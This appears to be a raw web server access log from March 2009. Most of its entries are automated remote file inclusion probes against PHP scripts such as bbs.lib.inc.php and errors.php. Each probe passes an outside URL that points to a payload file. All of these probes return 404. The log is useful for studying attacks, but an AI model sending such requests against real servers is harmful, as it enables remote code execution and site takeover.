217.130.244.44 - - [31/Mar/2009:02:40:18 -0500] "GET //testheaderpage.php?rootSys=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
217.130.244.44 - - [31/Mar/2009:02:40:18 -0500] "GET //testheaderpage.php?rootSys=http://www.isdewereldrond.nl/mambots/editors/pbot.gif? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
74.52.100.226 - - [31/Mar/2009:02:43:03 -0500] "GET //testheaderpage.php?rootSys=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
74.52.100.226 - - [31/Mar/2009:02:43:03 -0500] "GET /logs//testheaderpage.php?rootSys=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
209.17.186.94 - - [31/Mar/2009:02:43:05 -0500] "GET /logs/access_log.1234051200 HTTP/1.1" 200 112812 "-""Plonebot/0.1"
74.52.100.226 - - [31/Mar/2009:02:53:38 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.festiwal.zhp.info//components/Scanid.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
74.52.100.226 - - [31/Mar/2009:02:53:38 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.festiwal.zhp.info//components/Scanid.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
72.172.213.99 - - [31/Mar/2009:02:54:22 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pakmin.yourfreehosting.net/id.gif???? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
72.172.213.99 - - [31/Mar/2009:02:54:22 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pakmin.yourfreehosting.net/id.gif???? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
208.116.53.212 - - [31/Mar/2009:02:56:02 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://abaa.altervista.org/idnew.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.810"
208.116.53.212 - - [31/Mar/2009:02:56:03 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://abaa.altervista.org/idnew.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.810"
209.17.186.94 - - [31/Mar/2009:02:58:24 -0500] "GET /logs/access_log.1232064000 HTTP/1.1" 200 120936 "-""Plonebot/0.1"
74.52.100.226 - - [31/Mar/2009:03:01:20 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
74.52.100.226 - - [31/Mar/2009:03:01:20 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
201.72.166.52 - - [31/Mar/2009:03:03:23 -0500] "GET /logs/send_reminders.php?includedir=http://3sk3nt.kit.net/safe.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
201.72.166.52 - - [31/Mar/2009:03:03:23 -0500] "GET /send_reminders.php?includedir=http://3sk3nt.kit.net/safe.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
140.130.101.5 - - [31/Mar/2009:03:04:43 -0500] "GET //board/kboard.php?board=notice&act=view&no=27///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.creatavision.com/creative-manifesting-smf/id.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
140.130.101.5 - - [31/Mar/2009:03:04:43 -0500] "GET /logs//board/kboard.php?board=notice&act=view&no=27///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.creatavision.com/creative-manifesting-smf/id.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
140.130.101.5 - - [31/Mar/2009:03:04:43 -0500] "GET /logs/access_log.1228608000//board/kboard.php?board=notice&act=view&no=27///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.creatavision.com/creative-manifesting-smf/id.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
140.130.101.5 - - [31/Mar/2009:03:04:53 -0500] "GET //board/kboard.php?board=notice&act=view&no=27///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.creatavision.com/creative-manifesting-smf/id.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
140.130.101.5 - - [31/Mar/2009:03:04:53 -0500] "GET /logs//board/kboard.php?board=notice&act=view&no=27///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.creatavision.com/creative-manifesting-smf/id.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
140.130.101.5 - - [31/Mar/2009:03:04:53 -0500] "GET /logs/access_log.1228608000//board/kboard.php?board=notice&act=view&no=27///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.creatavision.com/creative-manifesting-smf/id.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
140.130.101.5 - - [31/Mar/2009:03:04:54 -0500] "GET /logs/access_log.1229472000//board/kboard.php?board=notice&act=view&no=27///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.creatavision.com/creative-manifesting-smf/id.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
140.130.101.5 - - [31/Mar/2009:03:05:10 -0500] "GET //board/kboard.php?board=notice&act=view&no=27///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.creatavision.com/creative-manifesting-smf/id.txt????? HTTP/1.1" 404 300 "-""Mozilla/5.0"
140.130.101.5 - - [31/Mar/2009:03:05:10 -0500] "GET /logs//board/kboard.php?board=notice&act=view&no=27///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.creatavision.com/creative-manifesting-smf/id.txt????? HTTP/1.1" 404 305 "-""Mozilla/5.0"
140.130.101.5 - - [31/Mar/2009:03:05:10 -0500] "GET /logs/access_log.1228608000//board/kboard.php?board=notice&act=view&no=27///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.creatavision.com/creative-manifesting-smf/id.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
140.130.101.5 - - [31/Mar/2009:03:05:10 -0500] "GET /logs/access_log.1229472000//board/kboard.php?board=notice&act=view&no=27///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.creatavision.com/creative-manifesting-smf/id.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
140.130.101.5 - - [31/Mar/2009:03:05:16 -0500] "GET //board/kboard.php?board=notice&act=view&no=27///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.creatavision.com/creative-manifesting-smf/id.txt????? HTTP/1.1" 404 300 "-""Mozilla/5.0"
140.130.101.5 - - [31/Mar/2009:03:05:16 -0500] "GET /logs//board/kboard.php?board=notice&act=view&no=27///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.creatavision.com/creative-manifesting-smf/id.txt????? HTTP/1.1" 404 305 "-""Mozilla/5.0"
140.130.101.5 - - [31/Mar/2009:03:05:16 -0500] "GET /logs/access_log.1228608000//board/kboard.php?board=notice&act=view&no=27///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.creatavision.com/creative-manifesting-smf/id.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
140.130.101.5 - - [31/Mar/2009:03:05:37 -0500] "GET /logs/access_log.1232409600//board/kboard.php?board=notice&act=view&no=27///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.creatavision.com/creative-manifesting-smf/id.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
201.72.166.52 - - [31/Mar/2009:03:12:09 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://3sk3nt.kit.net/safe.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
201.72.166.52 - - [31/Mar/2009:03:12:09 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://3sk3nt.kit.net/safe.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
208.111.154.15 - - [31/Mar/2009:03:20:06 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.15 - - [31/Mar/2009:03:20:06 -0500] "GET / HTTP/1.1" 200 3245 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
82.151.132.176 - - [31/Mar/2009:03:29:50 -0500] "GET /logs//errors.php?error=http://203.114.112.155/webboard1234/sett/1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
82.151.132.176 - - [31/Mar/2009:03:29:50 -0500] "GET //errors.php?error=http://203.114.112.155/webboard1234/sett/1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
82.151.132.176 - - [31/Mar/2009:03:29:50 -0500] "GET /logs/access_log.1228608000//errors.php?error=http://203.114.112.155/webboard1234/sett/1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
82.151.132.176 - - [31/Mar/2009:03:29:50 -0500] "GET /logs/access_log.1227916800//errors.php?error=http://203.114.112.155/webboard1234/sett/1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
200.165.79.34 - - [31/Mar/2009:03:30:28 -0500] "GET /logs/access_log.1227916800//errors.php?error=http://apocalypsostrike.freehostia.com/script/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
200.165.79.34 - - [31/Mar/2009:03:30:28 -0500] "GET //errors.php?error=http://apocalypsostrike.freehostia.com/script/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
200.165.79.34 - - [31/Mar/2009:03:30:28 -0500] "GET /logs//errors.php?error=http://apocalypsostrike.freehostia.com/script/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
200.165.79.34 - - [31/Mar/2009:03:30:28 -0500] "GET /logs/access_log.1226966400//errors.php?error=http://apocalypsostrike.freehostia.com/script/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
82.151.132.176 - - [31/Mar/2009:03:34:58 -0500] "GET /logs/access_log.1225238400//errors.php?error=http://203.114.112.155/webboard1234/sett/1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
218.27.203.107 - - [31/Mar/2009:03:37:40 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.27.203.107 - - [31/Mar/2009:03:37:40 -0500] "GET /logs/access_log.1233705600//include/bbs.lib.inc.php?site_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
218.27.203.107 - - [31/Mar/2009:03:37:40 -0500] "GET //include/bbs.lib.inc.php?site_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
218.27.203.107 - - [31/Mar/2009:03:38:20 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
163.24.136.10 - - [31/Mar/2009:03:39:01 -0500] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.koreavan.kr/technote6//data/id1.txt?%0D? HTTP/1.1" 404 314 "-""Mozilla/3.0 (OS/2; U)"
163.24.136.10 - - [31/Mar/2009:03:39:03 -0500] "GET /logs/access_log.1230249600//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.koreavan.kr/technote6//data/id1.txt?%0D? HTTP/1.1" 404 336 "-""Mozilla/3.0 (OS/2; U)"
218.27.203.107 - - [31/Mar/2009:03:39:25 -0500] "GET //include/bbs.lib.inc.php?site_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
218.27.203.107 - - [31/Mar/2009:03:39:25 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.27.203.107 - - [31/Mar/2009:03:39:25 -0500] "GET /logs/access_log.1233705600//include/bbs.lib.inc.php?site_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
65.55.208.123 - - [31/Mar/2009:03:39:27 -0500] "GET /logs/access_log.1172707200 HTTP/1.1" 200 10403 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.123 - - [31/Mar/2009:03:39:28 -0500] "GET /logs/access_log.1207785600 HTTP/1.1" 200 3019 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.123 - - [31/Mar/2009:03:39:28 -0500] "GET /logs/access_log.1149379200 HTTP/1.1" 200 845 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
163.30.112.6 - - [31/Mar/2009:03:41:09 -0500] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.koreavan.kr/technote6//data/id1.txt?%0D? HTTP/1.1" 404 309 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
163.30.112.6 - - [31/Mar/2009:03:41:09 -0500] "GET /logs/access_log.1230249600//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.koreavan.kr/technote6//data/id1.txt?%0D? HTTP/1.1" 404 336 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
163.30.112.6 - - [31/Mar/2009:03:41:09 -0500] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.koreavan.kr/technote6//data/id1.txt?%0D? HTTP/1.1" 404 314 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
218.27.203.107 - - [31/Mar/2009:03:41:22 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
200.165.79.34 - - [31/Mar/2009:03:42:47 -0500] "GET /logs/access_log.1228608000//errors.php?error=http://apocalypsostrike.freehostia.com/script/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
200.165.79.34 - - [31/Mar/2009:03:42:50 -0500] "GET /logs/access_log.1225238400//errors.php?error=http://apocalypsostrike.freehostia.com/script/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.55.167.116 - - [31/Mar/2009:03:47:41 -0500] "GET //include/bbs.lib.inc.php?site_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
216.55.167.116 - - [31/Mar/2009:03:47:41 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
216.55.167.116 - - [31/Mar/2009:03:47:41 -0500] "GET /logs/access_log.1233705600//include/bbs.lib.inc.php?site_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
216.55.167.116 - - [31/Mar/2009:03:48:58 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
72.249.95.103 - - [31/Mar/2009:03:49:05 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.249.95.103 - - [31/Mar/2009:03:49:05 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
72.249.95.103 - - [31/Mar/2009:03:49:05 -0500] "GET /logs/access_log.1233705600//include/bbs.lib.inc.php?site_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
72.249.95.103 - - [31/Mar/2009:03:49:20 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
69.50.208.139 - - [31/Mar/2009:03:49:51 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.50.208.139 - - [31/Mar/2009:03:49:52 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
69.50.208.139 - - [31/Mar/2009:03:49:52 -0500] "GET /logs/access_log.1233705600//include/bbs.lib.inc.php?site_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
69.50.208.139 - - [31/Mar/2009:03:50:01 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
85.25.94.44 - - [31/Mar/2009:03:50:05 -0500] "GET /errors.php?error=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
85.25.94.44 - - [31/Mar/2009:03:50:05 -0500] "GET /logs/errors.php?error=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
85.25.94.44 - - [31/Mar/2009:03:50:05 -0500] "GET /logs/access_log.1233014400/errors.php?error=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.25.94.44 - - [31/Mar/2009:03:51:08 -0500] "GET /logs/access_log.1235779200/errors.php?error=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
207.182.137.218 - - [31/Mar/2009:03:51:32 -0500] "GET /logs//include/write.php?dir=http://www.geocities.com/arifkuro/idpit.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
207.182.137.218 - - [31/Mar/2009:03:51:32 -0500] "GET /logs/access_log.1231286400//include/write.php?dir=http://www.geocities.com/arifkuro/idpit.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
207.182.137.218 - - [31/Mar/2009:03:51:32 -0500] "GET //include/write.php?dir=http://www.geocities.com/arifkuro/idpit.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
207.182.137.218 - - [31/Mar/2009:03:51:48 -0500] "GET /logs/access_log.1231804800//include/write.php?dir=http://www.geocities.com/arifkuro/idpit.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
195.239.110.66 - - [31/Mar/2009:03:53:05 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.geocities.com/aardua82/idq.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
195.239.110.66 - - [31/Mar/2009:03:53:06 -0500] "GET //config/dbutil.bck.php?confdir=http://www.geocities.com/aardua82/idq.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
195.14.58.2 - - [31/Mar/2009:03:56:05 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.knoum.or.kr/bbs/icon/v4id.txt??? HTTP/1.0" 404 300 "-""libwww-perl/5.48"
195.14.58.2 - - [31/Mar/2009:03:56:05 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.knoum.or.kr/bbs/icon/v4id.txt??? HTTP/1.0" 404 295 "-""libwww-perl/5.48"
77.232.66.20 - - [31/Mar/2009:03:56:14 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
77.232.66.20 - - [31/Mar/2009:03:56:14 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
77.232.66.20 - - [31/Mar/2009:03:56:14 -0500] "GET /logs/access_log.1233705600//include/bbs.lib.inc.php?site_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
77.232.66.20 - - [31/Mar/2009:03:56:47 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
88.198.10.3 - - [31/Mar/2009:04:03:07 -0500] "GET /logs//admin/index.php?_SERVER[DOCUMENT_ROOT]=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 304 "-""libwww-perl/5.803"
88.198.10.3 - - [31/Mar/2009:04:03:08 -0500] "GET //admin/index.php?_SERVER[DOCUMENT_ROOT]=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
88.198.10.3 - - [31/Mar/2009:04:03:08 -0500] "GET /logs//admin/index.php?_SERVER[DOCUMENT_ROOT]=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 304 "-""libwww-perl/5.803"
88.198.10.3 - - [31/Mar/2009:04:03:09 -0500] "GET //admin/index.php?_SERVER[DOCUMENT_ROOT]=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
88.198.10.3 - - [31/Mar/2009:04:03:09 -0500] "GET /logs//admin/index.php?_SERVER[DOCUMENT_ROOT]=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 304 "-""libwww-perl/5.803"
88.198.10.3 - - [31/Mar/2009:04:03:10 -0500] "GET //admin/index.php?_SERVER[DOCUMENT_ROOT]=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
88.198.10.3 - - [31/Mar/2009:04:03:10 -0500] "GET /logs//admin/index.php?_SERVER[DOCUMENT_ROOT]=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 304 "-""libwww-perl/5.803"
88.198.10.3 - - [31/Mar/2009:04:03:11 -0500] "GET //admin/index.php?_SERVER[DOCUMENT_ROOT]=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
61.8.0.58 - - [31/Mar/2009:04:07:00 -0500] "GET /logs/sql.php?classes_dir=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 295 "-""libwww-perl/5.64"
61.8.0.58 - - [31/Mar/2009:04:07:00 -0500] "GET /sql.php?classes_dir=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 290 "-""libwww-perl/5.64"
64.118.84.7 - - [31/Mar/2009:04:10:15 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ybrt.cn/data/id.txt?? HTTP/1.1" 404 353 "-""libwww-perl/5.811"
64.118.84.7 - - [31/Mar/2009:04:10:15 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ybrt.cn/data/id.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.811"
69.50.208.139 - - [31/Mar/2009:04:11:00 -0500] "GET /logs//include/write.php?dir=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
69.50.208.139 - - [31/Mar/2009:04:11:00 -0500] "GET /logs/access_log.1231286400//include/write.php?dir=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
69.50.208.139 - - [31/Mar/2009:04:11:00 -0500] "GET //include/write.php?dir=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
69.50.208.139 - - [31/Mar/2009:04:11:09 -0500] "GET /logs/access_log.1231804800//include/write.php?dir=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
65.98.60.170 - - [31/Mar/2009:04:18:33 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.c868z.cn/FX29ID1.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
65.98.60.170 - - [31/Mar/2009:04:18:33 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.c868z.cn/FX29ID1.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
65.98.60.170 - - [31/Mar/2009:04:18:33 -0500] "GET /logs/access_log.1235088000//admin/spaw/spaw_control.class.php?spaw_root=http://www.c868z.cn/FX29ID1.txt???? HTTP/1.1" 404 344 "-""Mozilla/5.0"
65.98.60.170 - - [31/Mar/2009:04:18:38 -0500] "GET /logs/access_log.1235001600//admin/spaw/spaw_control.class.php?spaw_root=http://www.c868z.cn/FX29ID1.txt???? HTTP/1.1" 404 344 "-""Mozilla/5.0"
202.165.244.10 - - [31/Mar/2009:04:18:41 -0500] "GET /logs//include/write.php?dir=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
202.165.244.10 - - [31/Mar/2009:04:18:41 -0500] "GET //include/write.php?dir=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
202.165.244.10 - - [31/Mar/2009:04:18:41 -0500] "GET /logs/access_log.1231286400//include/write.php?dir=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
202.165.244.10 - - [31/Mar/2009:04:19:31 -0500] "GET /logs/access_log.1231804800//include/write.php?dir=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
216.55.167.116 - - [31/Mar/2009:04:20:55 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
216.55.167.116 - - [31/Mar/2009:04:20:55 -0500] "GET /logs/access_log.1234137600//config/dbutil.bck.php?confdir=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
216.55.167.116 - - [31/Mar/2009:04:20:55 -0500] "GET //config/dbutil.bck.php?confdir=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
216.55.167.116 - - [31/Mar/2009:04:21:14 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
216.55.167.116 - - [31/Mar/2009:04:21:56 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
216.55.167.116 - - [31/Mar/2009:04:21:57 -0500] "GET //config/dbutil.bck.php?confdir=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
216.55.167.116 - - [31/Mar/2009:04:21:57 -0500] "GET /logs/access_log.1234137600//config/dbutil.bck.php?confdir=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
216.55.167.116 - - [31/Mar/2009:04:22:18 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
